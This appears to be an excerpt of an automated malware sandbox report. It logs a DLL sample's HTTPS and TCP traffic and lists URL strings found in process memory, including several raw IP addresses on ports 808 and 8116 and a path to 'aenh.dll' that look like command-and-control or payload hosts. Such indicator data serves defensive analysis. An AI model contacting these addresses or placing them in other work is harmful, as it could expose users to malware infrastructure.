Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:26:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:27:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:28:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:29:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:29:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:29:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:29:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:29:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:29:08 GMTContent-Type: text/plain; charset=utf-8Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47

Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.809813780.00000000009CA000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000008.00000003.433451417.0000000004B52000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?24a0c37885a46
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enK
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214/
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214/f
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/
Source: loaddll32.exe, 00000001.00000003.460682541.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/#
Source: loaddll32.exe, 00000001.00000003.547706915.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/%
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.460682541.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/5
Source: loaddll32.exe, 00000001.00000003.760088431.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/9%
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/My
Source: loaddll32.exe, 00000001.00000002.809608295.0000000000F79000.00000004.00000020.sdmp	String found in binary or memory: https://143.244.140.214:808/ad=
Source: rundll32.exe, 00000008.00000002.809865827.00000000009DA000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/b
Source: loaddll32.exe, 00000001.00000003.661087742.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/l9%
Source: loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/la
Source: loaddll32.exe, 00000001.00000002.808902264.0000000000ECB000.00000004.00000020.sdmp	String found in binary or memory: https://143.244.140.214:808/ll
Source: loaddll32.exe, 00000001.00000003.547706915.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/ll9%
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/zyJ
Source: loaddll32.exe, 00000001.00000003.488039771.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/~
Source: loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://182.46.210.220/
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.440681049.0000000000F42000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.811696720.0000000004B46000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47/
Source: rundll32.exe, 00000008.00000002.811696720.0000000004B46000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47/#
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.809865827.00000000009DA000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/
Source: loaddll32.exe, 00000001.00000003.776868957.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/0
Source: loaddll32.exe, 00000001.00000003.607089301.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/4ad=
Source: loaddll32.exe, 00000001.00000003.590323971.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/4ti
Source: loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/Bd
Source: rundll32.exe, 00000008.00000002.809865827.00000000009DA000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/H
Source: loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/Vdv
Source: loaddll32.exe, 00000001.00000003.616066058.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/ad=
Source: loaddll32.exe, 00000001.00000003.440681049.0000000000F42000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/e
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/f
Source: loaddll32.exe, 00000001.00000003.786947013.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/ll
Source: loaddll32.exe, 00000001.00000003.607089301.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/nd.
Source: loaddll32.exe, 00000001.00000003.590323971.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/r
Source: loaddll32.exe, 00000001.00000003.440681049.0000000000F42000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/soft
Source: rundll32.exe, 00000008.00000003.443284456.0000000004B53000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/
Source: loaddll32.exe, 00000001.00000003.471609876.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/#g
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/%
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/(g
Source: loaddll32.exe, 00000001.00000003.616066058.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220//)
Source: rundll32.exe, 00000008.00000002.811696720.0000000004B46000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/1
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/1g
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/6g
Source: loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/?g
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.809813780.00000000009CA000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/Certification
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/D
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/E
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/L
Source: loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/Nf
Source: rundll32.exe, 00000008.00000003.733323810.0000000004B54000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/V
Source: loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/Wfv
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/_
Source: loaddll32.exe, 00000001.00000003.760088431.0000000000F3F000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/aenh.dll
Source: loaddll32.exe, 00000001.00000003.786947013.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/aenh.dllU
Source: loaddll32.exe, 00000001.00000003.616066058.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/aenh.dllltb
Source: loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/ig$
